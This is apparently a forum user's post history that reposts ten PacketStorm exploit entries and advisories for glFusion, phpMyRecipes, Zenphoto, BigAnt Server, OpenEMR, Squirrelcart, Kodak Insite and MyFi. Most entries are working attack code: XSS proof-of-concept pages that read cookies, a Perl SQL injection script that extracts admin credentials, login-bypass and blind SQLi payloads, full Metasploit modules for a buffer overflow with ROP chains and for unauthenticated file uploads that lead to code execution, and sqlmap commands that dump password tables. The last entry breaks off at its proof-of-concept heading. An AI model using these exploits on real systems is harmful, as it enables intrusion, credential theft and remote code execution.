Jump to content

Praetorian503

Active Members
 View Profile  See their activity

  • Posts

    578

  • Joined

  • Last visited

  • Days Won

    5

 Content Type 

Everything posted by Praetorian503

  1. Praetorian503
    glFusion version 1.2.2 suffers from multiple cross site scripting vulnerabilities. Advisory ID: HTB23142 Product: glFusion Vendor: http://www.glfusion.org/ Vulnerable Version(s): 1.2.2 and probably prior Tested Version: 1.2.2 Vendor Notification: January 30, 2013 Vendor Patch: January 30, 2013 Public Disclosure: February 20, 2013 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: CVE-2013-1466 Risk Level: Medium CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered multiple XSS vulnerabilities in glFusion, which can be exploited to perform Cross-Site Scripting attacks. glFusion has a "bad_behaviour" plugin (installed by default) that verifies HTTP Referer, aimed to protect against spambots. The plugin also makes reflected XSS attacks against the application a little bit more complex. To bypass the security restriction PoC (Proof-of-Concept) codes for vulnerabilities 1.1 – 1.3 modify the HTTP Referer header. These PoCs were successfully tested in the latest available version of Mozilla Firefox (18.0.1) . 1) Multiple Cross-Site Scripting (XSS) in glFusion: CVE-2013-1466 1.1 The vulnerability exists due to insufficient filtration of user-supplied data in "subject" HTTP POST parameter passed to "/profiles.php" script. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. The PoC code below uses "alert()" JavaScript function to display user's cookies: <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> </head> <body> <script> var x = 0 function go2() { location.replace("") } function go() { if(x) return x += 1 try { var html = '<form target="_parent" action="http://[host]/profiles.php" method="post">' html += '<input type="hidden" name="uid" value="2">' html += '<input type="hidden" name="author" value="author">' html += '<input type="hidden" name="message" value="1">' html += '<input type="hidden" name="message_html" value="1">' html += '<input type="hidden" name="authoremail" value="mail@mail.com">' html += '<input type="hidden" name="postmode" value="html">' html += '<input type="hidden" name="what" value="contact">' html += '<input type="hidden" name="subject" value=\'" onmouseover="javascript:alert(document.cookie);"\'></form>' window.frames[0].document.body.innerHTML = html window.frames[0].document.forms[0].submit() } catch(e) { go2() } } </script> <iframe onload="window.setTimeout('go()', 99)" src="about:blank" style="visibility:hidden"> </iframe> <script> window.setTimeout('go2()', 3333) </script> </body> </html> 1.2 The vulnerabilities exist due to insufficient filtration of user-supplied data in "address1", "address2", "calendar_type", "city", "state", "title", "url", "zipcode" HTTP POST parameters passed to "/calendar/index.php" script. A remote attacker can trick a logged-in user into opening a specially crafted link and execute arbitrary HTML and script code in user’s browser in context of the vulnerable website. The PoC code below uses "alert()" JavaScript function to display user's cookies: <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> </head> <body> <script> var x = 0 function go2() { location.replace("") } function go() { if(x) return x += 1 try { var html = '<form target="_parent" action="http://[host]/calendar/index.php" method="post">' html += '<input type="hidden" name="mode" value="Submit">' html += '<input type="hidden" name="savecal" value="Submit">' html += '<input type="hidden" name="address1" value=\'" onmouseover="javascript:alert(document.cookie);"\'>' html += '<input type="hidden" name="calendar_type" value=\'" onmouseover="javascript:alert(document.cookie);"\'>' html += '<input type="hidden" name="city" value=\'" onmouseover="javascript:alert(document.cookie);"\'>' html += '<input type="hidden" name="state" value=\'" onmouseover="javascript:alert(document.cookie);"\'>' html += '<input type="hidden" name="title" value=\'" onmouseover="javascript:alert(document.cookie);"\'>' html += '<input type="hidden" name="url" value=\'" onmouseover="javascript:alert(document.cookie);"\'>' html += '<input type="hidden" name="zipcode" value=\'" onmouseover="javascript:alert(document.cookie);"\'>' html += '<input type="hidden" name="address2" value=\'" onmouseover="javascript:alert(document.cookie);"\'></form>' window.frames[0].document.body.innerHTML = html window.frames[0].document.forms[0].submit() } catch(e) { go2() } } </script> <iframe onload="window.setTimeout('go()', 99)" src="about:blank" style="visibility:hidden"> </iframe> <script> window.setTimeout('go2()', 3333) </script> </body> </html> 1.3 The vulnerabilities exists due to insufficient filtration of user-supplied data in "title" and "url" HTTP POST parameters passed to "/links/index.php" script. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. The PoC code below uses "alert()" JavaScript function to display user's cookies: <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> </head> <body> <script> var x = 0 function go2() { location.replace("") } function go() { if(x) return x += 1 try { var html = '<form target="_parent" action="http://[host]/links/index.php" method="post">' html += '<input type="hidden" name="mode" value="Submit">' html += '<input type="hidden" name="title" value=\'" onmouseover="javascript:alert(1);"\'>' html += '<input type="hidden" name="url" value=\'" onmouseover="javascript:alert(2);"\'></form>' window.frames[0].document.body.innerHTML = html window.frames[0].document.forms[0].submit() } catch(e) { go2() } } </script> <iframe onload="window.setTimeout('go()', 99)" src="about:blank" style="visibility:hidden"> </iframe> <script> window.setTimeout('go2()', 3333) </script> </body> </html> 1.4 The vulnerability exists due to insufficient filtration of user-supplied data in URI after "/admin/plugins/mediagallery/xppubwiz.php" script. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. The PoC code below uses "alert()" JavaScript function to display user's cookies: http://[host]/admin/plugins/mediagallery/xppubwiz.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E/ ----------------------------------------------------------------------------------------------- Solution: Upgrade to glFusion v1.2.2.pl4 More Information: http://www.glfusion.org/article.php/glf122_update_20130130_01 http://www.glfusion.org/filemgmt/viewcat.php?cid=1 ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23142 - https://www.htbridge.com/advisory/HTB23142 - Multiple Cross-Site Scripting (XSS) in glFusion. [2] glFusion - http://www.glfusion.org/ - glFusion is an open source content management system developed in PHP providing blog, forum, gallery, downloads. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. Source: PacketStorm
  2. Praetorian503
    phpMyRecipes version 1.2.2 remote SQL injection exploit. #phpMyRecipes 1.2.2 SQL Injection Exploit #By cr4wl3r http://bastardlabs.info #Script: http://sourceforge.net/projects/php-myrecipes/files/ #Demo: http://bastardlabs.info/demo/phpMyRecipes.png #Tested: Ubuntu Linux # # Bugs found in viewrecipe.php # # $r_id = $_GET['r_id']; # # if (! ($result = mysql_query("SELECT # name,category,servings,ingredients,instructions,description,creator,editor,imagefile FROM recipes WHERE id=$r_id"))) { # dberror("viewrecipe.php", "Cannot select recipe"); # } # # http://bastardlabs/[path]/recipes/viewrecipe.php?r_id=[SQLi] # Example: http://bastardlabs/[path]/recipes/viewrecipe.php?r_id=NULL/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,password)GORONTALO,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/users # # # $ perl recipes.pl localhost /demo/ # [+] Please Wait ... # # [+] Getting Username and Password [ ok ] # [+] w00tw00t # [+] Username | Password --> admin:mps4BNRRjh3po #!/usr/bin/perl use IO::Socket; $host = $ARGV[0]; $path = $ARGV[1]; if (@ARGV < 2) { print qq( +---------------------------------------------+ | phpMyRecipes 1.2.2 SQL Injection Exploit | | | | coded & exploited by cr4wl3r | | http://bastardlabs.info/ | +---------------------------------------------+ -=[X]=- +--------------------------------------- Usage : perl $0 <host> <path> ex : perl $0 127.0.0.1 /phpMyRecipes/ +--------------------------------------- ); } $target = "http://".$host.$path."/recipes/viewrecipe.php?r_id=NULL/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,password)GORONTALO,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/users"; $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") || die "[-] Can't connect to Server [ failed ]\n"; print "[+] Please Wait ...\n"; print $sock "GET $target HTTP/1.1\n"; print $sock "Accept: */*\n"; print $sock "User-Agent: BastardLabs\n"; print $sock "Host: $host\n"; print $sock "Connection: close\n\n"; sleep 2; while ($answer = <$sock>) { if ($answer =~ /<B>(.*?)<\/B>/) { print "\n[+] Getting Username and Password [ ok ]\n"; sleep 1; print "[+] w00tw00t\n"; print "[+] Username | Password --> $1\n"; exit(); } } print "[-] Exploit Failed !\n"; Source: PacketStorm
  3. Praetorian503
    RTTucson Quotations Database Script suffers from a remote SQL injection vulnerability that allows for authentication bypass. # RTTucson Quotations Database Script (Auth Bypass) SQL Injection Vulnerability # By cr4wl3r http://bastardlabs.info # Script: http://www.rttucson.com/files.html # Bugs found /quotations/admin/include/login.php --------------------------- 36 if ($_POST['submit']) { 37 38 $Username = $_POST['Username']; 39 $Password = md5($_POST['Password']); 40 41 $query = "SELECT * from UsersTBL WHERE Username='$Username' AND Password='$Password'"; 42 $result = mysql_query($query) or die ( mysql_error() ); --------------------------- Proof of Concept http://bastardlabs/[path]/admin/include/login.php Username: 'or'1=1 Password: cr4wl3r Source: PacketStorm
  4. Praetorian503
    Zenphoto version 1.4.4.1 suffers from a remote blind SQL injection vulnerability. ###################################################################################### # # # Exploit Title : Zenphoto ver 1.4.4.1 Blind SQL Injection # # # # Author : HosseinNsn # # # # Home : http://Emperor-Team.Org # # # # Software Link : http://www.zenphoto.org # # # # Security Risk : High # # # # Version : 1.4.4.1 # # # # Tested on : Linux - Windows # # # # Google Dork : "Powered by Zenphoto" # # # ###################################################################################### # # # Exploit : # # # # [Target]/index.php?rss=undefined+and+1%3D0?=en[Blind SQL Injection] # # # ###################################################################################### # # # SPL TNX : Mr.F@RDIN . Mr.Milad . Expl0!ter . arash 281 . ??.????@? . M?.MOHS3N # # # # Mr.SobhaN S[s]S . H0553|N7 . IrIsT . Mr.Treh . H@M3D . hono . EhsanAvr # # # # Invisible . bl4ckcod3r . MR.ARTAN . ??.??????? . WANTED . Mr.Amir # # # ###################################################################################### Source: PacketStorm
  5. Praetorian503
    This Metasploit module exploits a stack buffer overflow in BigAnt Server 2.97 SP7. The vulnerability is due to the dangerous usage of strcpy while handling errors. This module uses a combination of SCH and DUPF request to trigger the vulnerability, and has been tested successfully against version 2.97 SP7 over Windows XP SP3 and Windows 2003 SP2. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'BigAnt Server 2 SCH And DUPF Buffer Overflow', 'Description' => %q{ This exploits a stack buffer overflow in BigAnt Server 2.97 SP7. The vulnerability is due to the dangerous usage of strcpy while handling errors. This module uses a combination of SCH and DUPF request to trigger the vulnerability, and has been tested successfully against version 2.97 SP7 over Windows XP SP3 and Windows 2003 SP2. }, 'Author' => [ 'Hamburgers Maccoy', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2012-6275' ], [ 'US-CERT-VU', '990652' ], [ 'BID', '57214' ], [ 'OSVDB', '89344' ] ], 'Payload' => { 'Space' => 2500, 'BadChars' => "\x00\x0a\x0d\x25\x27", 'DisableNops' => true, 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 }, 'Platform' => 'win', 'Targets' => [ [ 'BigAnt Server 2.97 SP7 / Windows XP SP3', { 'Offset' => 629, 'Ret' => 0x77c21ef4, # ppr from msvcrt 'JmpESP' => 0x77c35459, # push esp # ret from msvcrt 'FakeObject' => 0x77C60410 # .data from msvcrt } ], [ 'BigAnt Server 2.97 SP7 / Windows 2003 SP2', { 'Offset' => 629, 'Ret' => 0x77bb287a, # ppr from msvcrt 'FakeObject' => 0x77bf2460, # .data from msvcrt :callback_rop => :w2003_sp2_rop } ] ], 'Privileged' => true, 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 09 2013')) register_options([Opt::RPORT(6661)], self.class) end def junk(n=4) return rand_text_alpha(n).unpack("V")[0].to_i end def nop return make_nops(4).unpack("V")[0].to_i end def w2003_sp2_rop rop_gadgets = [ 0x77bc5d88, # POP EAX # RETN 0x77ba1114, # <- *&VirtualProtect() 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN junk, 0x77bb0c86, # XCHG EAX,ESI # RETN 0x77bc9801, # POP EBP # RETN 0x77be2265, # ptr to 'push esp # ret' 0x77bc5d88, # POP EAX # RETN 0x03C0990F, 0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx) 0x77bb48d3, # POP EBX, RET 0x77bf21e0, # .data 0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN 0x77bbfc02, # POP ECX # RETN 0x77bef001, # W pointer (lpOldProtect) (-> ecx) 0x77bd8c04, # POP EDI # RETN 0x77bd8c05, # ROP NOP (-> edi) 0x77bc5d88, # POP EAX # RETN 0x03c0984f, 0x77bdd441, # SUB EAX, 03c0940f 0x77bb8285, # XCHG EAX,EDX # RETN 0x77bc5d88, # POP EAX # RETN nop, 0x77be6591, # PUSHAD # ADD AL,0EF # RETN ].pack("V*") return rop_gadgets end def exploit sploit = rand_text_alpha(target['Offset']) sploit << [target.ret].pack("V") sploit << [target['FakeObject']].pack("V") sploit << [target['FakeObject']].pack("V") if target[:callback_rop] and self.respond_to?(target[:callback_rop]) sploit << self.send(target[:callback_rop]) else sploit << [target['JmpESP']].pack("V") end sploit << payload.encoded random_filename = rand_text_alpha(4) random_date = "#{rand_text_numeric(4)}-#{rand_text_numeric(2)}-#{rand_text_numeric(2)} #{rand_text_numeric(2)}:#{rand_text_numeric(2)}:#{rand_text_numeric(2)}" random_userid = rand_text_numeric(1) random_username = rand_text_alpha_lower(5) random_content = rand_text_alpha(10 + rand(10)) sch = "SCH 16\n" sch << "cmdid: 1\n" sch << "content-length: 0\n" sch << "content-type: Appliction/Download\n" sch << "filename: #{random_filename}.txt\n" sch << "modified: #{random_date}\n" sch << "pclassid: 102\n" sch << "pobjid: 1\n" sch << "rootid: 1\n" sch << "sendcheck: 1\n" sch << "source_cmdname: DUPF\n" sch << "source_content-length: 116619\n" sch << "userid: #{random_userid}\n" sch << "username: #{sploit}\n\n" print_status("Trying target #{target.name}...") connect print_status("Sending SCH request...") sock.put(sch) res = sock.get_once if res.nil? fail_with(Exploit::Failure::Unknown, "No response to the SCH request") end if res=~ /scmderid: \{(.*)\}/ scmderid = $1 else fail_with(Exploit::Failure::UnexpectedReply, "scmderid value not found in the SCH response") end dupf = "DUPF 16\n" dupf << "cmdid: 1\n" dupf << "content-length: #{random_content.length}\n" dupf << "content-type: Appliction/Download\n" dupf << "filename: #{random_filename}.txt\n" dupf << "modified: #{random_date}\n" dupf << "pclassid: 102\n" dupf << "pobjid: 1\n" dupf << "rootid: 1\n" dupf << "scmderid: {#{scmderid}}\n" dupf << "sendcheck: 1\n" dupf << "userid: #{random_userid}\n" dupf << "username: #{random_username}\n\n" dupf << random_content print_status("Sending DUPF request...") sock.put(dupf) #sock.get_once disconnect end end Source: PacketStorm
  6. Praetorian503
    This Metasploit module exploits an arbitrary file upload vulnerability in BigAnt Server 2.97 SP7. A lack of authentication allows to make unauthenticated file uploads through a DUPF command. Additionally the filename option in the same command can be used to launch a directory traversal attack and achieve arbitrary file upload. The module uses uses the Windows Management Instrumentation service to execute an arbitrary payload on vulnerable installations of BigAnt on Windows XP and 2003. It has been successfully tested on BigAnt Server 2.97 SP7 over Windows XP SP3 and 2003 SP2. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::EXE include Msf::Exploit::WbemExec include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'BigAnt Server DUPF Command Arbitrary File Upload', 'Description' => %q{ This exploits an arbitrary file upload vulnerability in BigAnt Server 2.97 SP7. A lack of authentication allows to make unauthenticated file uploads through a DUPF command. Additionally the filename option in the same command can be used to launch a directory traversal attack and achieve arbitrary file upload. The module uses uses the Windows Management Instrumentation service to execute an arbitrary payload on vulnerable installations of BigAnt on Windows XP and 2003. It has been successfully tested on BigAnt Server 2.97 SP7 over Windows XP SP3 and 2003 SP2. }, 'Author' => [ 'Hamburgers Maccoy', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2012-6274' ], [ 'US-CERT-VU', '990652' ], [ 'BID', '57214' ], [ 'OSVDB', '89342' ] ], 'Privileged' => true, 'Platform' => 'win', 'Targets' => [ [ 'BigAnt Server 2.97 SP7', { } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'WfsDelay' => 10 }, 'DisclosureDate' => 'Jan 09 2013')) register_options( [ Opt::RPORT(6661), OptInt.new('DEPTH', [true, "Levels to reach base directory", 6]) ], self.class) end def upload_file(filename, content) random_date = "#{rand_text_numeric(4)}-#{rand_text_numeric(2)}-#{rand_text_numeric(2)} #{rand_text_numeric(2)}:#{rand_text_numeric(2)}:#{rand_text_numeric(2)}" dupf = "DUPF 16\n" dupf << "cmdid: 1\n" dupf << "content-length: #{content.length}\n" dupf << "content-type: Appliction/Download\n" dupf << "filename: #{"\\.." * datastore['DEPTH']}\\#{filename}\n" dupf << "modified: #{random_date}\n" dupf << "pclassid: 102\n" dupf << "pobjid: 1\n" dupf << "rootid: 1\n" dupf << "sendcheck: 1\n\n" dupf << content print_status("sending DUPF") connect sock.put(dupf) res = sock.get_once disconnect return res end def exploit peer = "#{rhost}:#{rport}" # Setup the necessary files to do the wbemexec trick exe_name = rand_text_alpha(rand(10)+5) + '.exe' exe = generate_payload_exe mof_name = rand_text_alpha(rand(10)+5) + '.mof' mof = generate_mof(mof_name, exe_name) print_status("#{peer} - Sending HTTP ConvertFile Request to upload the exe payload #{exe_name}") res = upload_file("WINDOWS\\system32\\#{exe_name}", exe) if res and res =~ /DUPF/ and res =~ /fileid: (\d+)/ print_good("#{peer} - #{exe_name} uploaded successfully") else if res and res =~ /ERR 9/ and res =~ /#{exe_name}/ and res =~ /lasterror: 183/ print_error("#{peer} - Upload failed, check the DEPTH option") end fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Failed to upload #{exe_name}") end print_status("#{peer} - Sending HTTP ConvertFile Request to upload the mof file #{mof_name}") res = upload_file("WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) if res and res =~ /DUPF/ and res =~ /fileid: (\d+)/ print_good("#{peer} - #{mof_name} uploaded successfully") register_file_for_cleanup(exe_name) register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}") else if res and res =~ /ERR 9/ and res =~ /#{exe_name}/ and res =~ /lasterror: 183/ print_error("#{peer} - Upload failed, check the DEPTH option") end fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Failed to upload #{mof_name}") end end end Source: PacketStorm
  7. Praetorian503
    This Metasploit module exploits a vulnerability found in OpenEMR 4.1.1. By abusing the ofc_upload_image.php file from the openflashchart library, a malicious user can upload a file to the tmp-upload-images directory without any authentication, which results in arbitrary code execution. The module has been tested successfully on OpenEMR 4.1.1 over Ubuntu 10.04. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => "OpenEMR PHP File Upload Vulnerability", 'Description' => %q{ This module exploits a vulnerability found in OpenEMR 4.1.1 By abusing the ofc_upload_image.php file from the openflashchart library, a malicious user can upload a file to the tmp-upload-images directory without any authentication, which results in arbitrary code execution. The module has been tested successfully on OpenEMR 4.1.1 over Ubuntu 10.04. }, 'License' => MSF_LICENSE, 'Author' => [ 'Gjoko Krstic <gjoko[at]zeroscience.mk>', # Discovery, PoC 'juan vazquez' # Metasploit module ], 'References' => [ [ 'OSVDB', '90222' ], [ 'BID', '37314' ], [ 'EBD', '24492' ], [ 'URL', 'http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5126.php' ], [ 'URL', 'http://www.open-emr.org/wiki/index.php/OpenEMR_Patches' ] ], 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [ ['OpenEMR 4.1.1', {}] ], 'Privileged' => false, 'DisclosureDate' => "Feb 13 2013", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path to EGallery', '/openemr']) ], self.class) end def check uri = target_uri.path peer = "#{rhost}:#{rport}" # Check version print_status("#{peer} - Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "interface", "login", "login.php") }) if res and res.code == 200 and res.body =~ /v(\d\.\d\.\d)/ version = $1 else return Exploit::CheckCode::Unknown end print_status("#{peer} - Version #{version} detected") if version > "4.1.1" return Exploit::CheckCode::Safe end # Check for vulnerable component print_status("#{peer} - Trying to detect the vulnerable component") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri("#{uri}", "library", "openflashchart", "php-ofc-library", "ofc_upload_image.php"), }) if res and res.code == 200 and res.body =~ /Saving your image to/ return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end def exploit uri = target_uri.path peer = "#{rhost}:#{rport}" payload_name = rand_text_alpha(rand(10) + 5) + '.php' my_payload = payload.encoded print_status("#{peer} - Sending PHP payload (#{payload_name})") res = send_request_raw({ 'method' => 'POST', 'uri' => normalize_uri("#{uri}", "library", "openflashchart", "php-ofc-library", "ofc_upload_image.php") + "?name=#{payload_name}", 'headers' => { "Content-Length" => my_payload.length.to_s }, 'data' => my_payload }) # If the server returns 200 and the body contains our payload name, # we assume we uploaded the malicious file successfully if not res or res.code != 200 or res.body !~ /Saving your image to.*#{payload_name}$/ fail_with(Exploit::Failure::NotVulnerable, "#{peer} - File wasn't uploaded, aborting!") end register_file_for_cleanup(payload_name) print_status("#{peer} - Executing PHP payload (#{payload_name})") # Execute our payload res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri("#{uri}", "library", "openflashchart", "tmp-upload-images", payload_name), }) # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. Print the status code for debugging purposes. if res and res.code != 200 print_error("#{peer} - Server returned #{res.code.to_s}") end end end Source: PacketStorm
  8. Praetorian503
    Squirrelcart version 3.5.4 suffers from a reflective cross site scripting vulnerability. Squirrelcart v3.5.4 (table) Remote Cross-Site Scripting Vulnerability Vendor: Lighthouse Development Product web page: http://www.squirrelcart.com Affected version: v2.0.0 - 3.5.4 Summary: Squirrelcart PHP Shopping Cart software is a fully customizable, robust php shopping cart, designed with the advanced developer and web novice in mind. Desc: Squirrelcart suffers from a XSS issue due to a failure to properly sanitize user-supplied input to the 'table' GET parameter in the 'index.php' script. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user's browser session. Tested on: Linux, Apache, PHP, MySQL Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience.mk Vendor status: [17.02.2013] Vulnerability discovered. [19.02.2013] Contact with the vendor. [19.02.2013] Vendor responds asking more details. [19.02.2013] Sent details to the vendor. [19.02.2013] Vendor confirms the vulnerability. [19.02.2013] Vendor releases version 3.5.5 to address this issue. [19.02.2013] Coordinated public security advisory released. Advisory ID: ZSL-2013-5128 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5128.php Vendor ID: SC130218 Vendor URL: http://www.squirrelcart.com/downloads.php Vendor Patch: http://www.squirrelcart.com/index.php?downloads=1&id=123 17.02.2013 -- http://192.168.16.101/index.php?show_record_links=1&table=Products"><script>alert(251);</script>&add_new_item=1 Source: PacketStorm
  9. Praetorian503
    Kodak's Insite Creative Workflow System suffers from a remote SQL injection vulnerability. Hello ... While investigating a recent installation of Kodak's Insite Creative Workflow System (for my current employer), an SQL Injection vulnerability was discovered in its "Forgot Your Password?" page. An example of this application can be seen on the Kodak site. https://creativeworkflow.kodak.com/TwAmWeb/login.asp Many other copies of Kodak Insite can be located with any search engine by looking for the string "insite creative login". Our installation was setup on an internal site, and as such, SQLMAP was applied to our local copy, as follows. sqlmap.py -u 'http://localhost/TwAmWeb/EmailPassword.asp' --data='user_name=1&Language=en' -p user_name --risk=3 --level=5 -o sqlmap identified the following injection points with a total of 163 HTTP(s) requests: --- Place: POST Parameter: user_name Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: user_name=1') AND 5065=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(118)||CHR(110)||CHR(101)||CHR(58)||(SELECT (CASE WHEN (5065=5065) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(116)||CHR(121)||CHR(112)||CHR(58)||CHR(62))) FROM DUAL) AND ('yCTb'='yCTb&Language=en Type: AND/OR time-based blind Title: Oracle OR time-based blind Payload: user_name=-2979') OR 1635=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(80)||CHR(114)||CHR(122),5) AND ('NjHU'='NjHU&Language=en --- [11:52:56] [INFO] the back-end DBMS is Oracle web server operating system: Windows 2003 web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Oracle [11:52:56] [WARNING] HTTP error codes detected during testing: 500 (Internal Server Error) - 44 times A little fishing around and it becomes obvious that all usernames/passwords can be downloaded like this: sqlmap.py -u 'http://localhost/TwAmWeb/EmailPassword.asp' --data='user_name=1&Language=en' --risk=3 --level=5 -o -D PRINERGY -T DBCS_REMOTEUSER --columns --dump Supposedly Kodak will be releasing a fix in September. ... Robert Source: PacketStorm
  10. Praetorian503
    MyFi Wireless Disk version 1.2 suffers from cross site request forgery, local file inclusion, and remote command injection vulnerabilities. Title: ====== MyFi Wireless Disk 1.2 iPad iPhone - Multiple Vulnerabilities Date: ===== 2013-02-13 References: =========== http://www.vulnerability-lab.com/get_content.php?id=864 VL-ID: ===== 864 Common Vulnerability Scoring System: ==================================== 8.3 Introduction: ============= MyFi Wireless-Disk turns your iPhone into a mobile wireless disk - Access your files from any web browser. mobile or desktop. Internet Explorer, Safari, Chrome, Firefox - they are all supported. - Share access to your files with friends. All they need to do is write your iDevice address as it shows in MyFi Wireless-Disk in their browser - Upload new files to your Wireless-Disk from any web browser. - Integration with iTunes file sharing. - Web preview panel to see exactly how others will see your files when opened in browser. - File manager, where you can view and manage your files, no network is required. - Usage graphs for upload and download, storage and users. - Supports landscape and portrait orientation. - Supports iPods, iPhones and iPad. - Supports many file formats in preview, movies, audio, documents and presentations. - Supports multi user access. - No limitation on file size. - No limitation on number of files. (Copy of the Homepage: https://itunes.apple.com/us/app/wireless-disk-free/id558304402) Abstract: ========= The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the mobile MyFi Wireless Disk v1.2 app for the apple ipad & iphone. Report-Timeline: ================ 2013-02-13: Public Disclosure Status: ======== Published Affected Products: ================== Apple AppStore Product: MyFi Wireless Disk 1.2 Exploitation-Technique: ======================= Remote Severity: ========= Critical Details: ======== 1.1 A local file include web vulnerability via POST request method is detected in the mobile MyFi Wireless Disk v1.2 app for the apple ipad & iphone. The vulnerability allows remote attackers via POST method to inject local app webserver folders to request unauthorized local webserver files. The vulnerbility is located in the upload file module of the webserver (http://192.168.0.10:80) when processing to upload a file with manipulated `filename` parameter. The execution of the injected path or file request will occur when the attacker is processing to reload to index listing of the affected module. Exploitation of the web vulnerability does not require a privileged application user account (standard) or user interaction. Successful exploitation of the vulnerability results in unauthorized path or file access via local file or path include attack. Vulnerable Application(s): [+] MyFi Wireless Disk v1.2 - ITunes or AppStore (Apple) Vulnerable Module(s): [+] Upload File Vulnerable Parameter(s): [+] filename Affected Module(s): [+] File Dir - Index Listing 1.2 A local command injection web vulnerability is detected in the mobile MyFi Wireless Disk v1.2 app for the apple ipad & iphone. The vulnerability allows to inject local commands via vulnerable system values to compromise the apple mobile application. The vulnerbility is located in the index module when processing to load the ipad or iphone device name. Local attackers can change the ipad or iphone device name to system specific commands and file/path requests to provoke the execution when processing to watch the index listing. Exploitation of the web vulnerability requires a local privileged device user account (standard) without user interaction. Successful exploitation of the vulnerability results unauthorized execution of system specific commands or file/path requests. Vulnerable Application(s): [+] MyFi Wireless Disk v1.2 - ITunes or AppStore (Apple) Vulnerable Module(s): [+] Index Vulnerable Parameter(s): [+] device name - iPad or iPone Affected Module(s): [+] Application Header - Index Listing 1.3 A cross site request forgery web vulnerability is detected in the mobile MyFi Wireless Disk v1.2 app for the apple ipad & iphone. The vulnerability allows remote attackers to form manipulated links or scripts to execute application functions when processing to load client side requests in the web browser. The vulnerability is located in the application delete module and the not secure parsed file parameter. Remote attacker can force application users with not expired session to execute application function when processing to click a manipulated link. Exploitation of the vulnerability requires medium or high user interaction without privileged application user account. Successful exploitation of the vulnerability result in account steal via client side session hijacking, client site phishing, or client-side content request manipulation. Vulnerable Application(s): [+] MyFi Wireless Disk v1.2 - ITunes or AppStore (Apple) Vulnerable Module(s): [+] Delete Vulnerable Module(s): [+] file Affected Module(s): [+] File Dir - Listing Proof of Concept: 